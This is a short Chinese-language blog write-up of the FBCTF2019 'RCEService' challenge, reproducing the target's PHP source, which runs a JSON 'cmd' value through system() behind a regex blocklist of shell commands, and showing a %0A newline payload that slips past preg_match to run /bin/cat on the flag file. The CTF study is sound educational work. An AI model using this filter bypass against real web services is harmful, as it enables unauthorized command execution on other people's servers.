V3D4's Blog

安全技术记录/分享/交流

0%

[FBCTF2019]RCEService

打开发现一个需要输入json的的页面

随便输入个数发现出现cmd,于是尝试这样输入

发现只能执行ls,其他命令都不行

先知中找到了后台的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];

if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}

?>

过滤的很严,但是可以绕过preg_match函数本身

因为preg_match只会去匹配第一行,所以这里可以用多行进行绕过,就是加入%0A即可,记得前面后面都加上

源码中可以看到putenv(‘PATH=/home/rceservice/jail’)已经修改了环境变量,我们只能用绝对路径来调用系统命令

命令在/bin中保存

根目录下并没有flag,查看/home/rceservice/发现flag

所以构造出payload ,%0A是换行符

1
{%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}